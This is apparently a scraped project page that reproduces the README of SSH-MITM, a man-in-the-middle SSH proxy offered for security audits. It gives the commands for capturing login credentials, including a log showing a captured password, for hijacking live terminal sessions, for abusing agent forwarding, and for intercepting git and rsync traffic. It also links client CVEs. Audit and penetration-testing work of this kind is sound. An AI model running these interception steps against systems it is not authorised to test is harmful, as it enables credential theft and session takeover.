Enjoying this site? Please to help keep the Snapstats.org lights on.

Description

ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation

Features

• Hijacking and logging of terminal sessions
• support for ssh commands (e.g. git over ssh)
• SCP and SFTP
  • store files
  • replace files
  • inject additional files
• Agent Forwarding
• Port Forwarding
• Check and test clients against known vulnerabilities
• Plugin support

Connect to the network

To start an intercepting mitm-ssh server on Port 10022, all you have to do is run a single command.

$ ssh-mitm --remote-host 192.168.0.x

Now let's try to connect to the ssh-mitm server.

$ ssh -p 10022 user@proxyserver

You will see the credentials in the log output.

2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
    Remote Address: 192.168.0.x
    Port: 22
    Username: user
    Password: supersecret
    Key: None
    Agent: None

Hijack SSH sessions

When a client connects, the ssh-mitm starts a new server, which is used for session hijacking.

[INFO] created injector shell on port 34463

To hijack this session, you can use your favorite ssh client. All you have to do is to connect to the hijacked session.

$ ssh -p 34463 127.0.0.1

Advanced usage

SSH-MITM proxy server is capable of advanced man in the middle attacks and can be used in scenarios, where the remote host is not known or a single remote host is not sufficient or public key authentication is usded.

Public key authentication

Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.

The advantage is, that no confidential data needs to be sent to the remote host which can be intercepted by a man in the middle attack.

Due to this design concept, SSH-MITM proxy server is not able to reuse the data provided during authentication.

It you need to intercept a client with public key authentication, there are some options.

SSH supports agent forwarding, which allows a remote host to authenticate against another remote host.

SSH-MITM proxy server is able to request the agent from the client and use it for remote authentication. By using this feature, a SSH-MITM proxy server is able to do a full man in the middle attack.

Using agent forwarding, SSH-MITM proxy server must be started with --request-agent.

$ ssh-mitm --request-agent --remote-host 192.168.0.x

The client must be started with agent forwarding enabled.

$ ssh -A -p 10022 user@proxyserver

Intercept git

In most cased, when git is used over ssh, public key authentication is used. The default git command does not have a forward agent parameter.

To enable agent forwarding, git has to be executed with the GIT_SSH_COMMAND environment variable.

# start the ssh server
ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
# invoke git commands
GIT_SSH_COMMAND="ssh -A" git clone ssh://git@127.0.0.1:10022/ssh-mitm/ssh-mitm.git

Intercept rsync

When ssh-mitm is used to intercept rsync, the port must be provided as a parameter to rsync. Also the agent can be forwarded, if needed.

To sync a local directory with a remote directory, rsync can be executed with following parameters.

rsync -r -e 'ssh -p 10022 -A' /local/folder/ user@127.0.0.1:/remote/folder/

Further steps

SSH-MITM has some client exploits integrated, which can be used to audit various ssh clients like OpenSSH and PuTTY.

• https://docs.ssh-mitm.at/CVE-2021-33500.html
• https://docs.ssh-mitm.at/CVE-2020-14145.html
• https://docs.ssh-mitm.at/CVE-2020-14002.html
• https://docs.ssh-mitm.at/CVE-2019-6111.html
• https://docs.ssh-mitm.at/CVE-2019-6110.html
• https://docs.ssh-mitm.at/CVE-2019-6109.html

Full Documentation: https://docs.ssh-mitm.at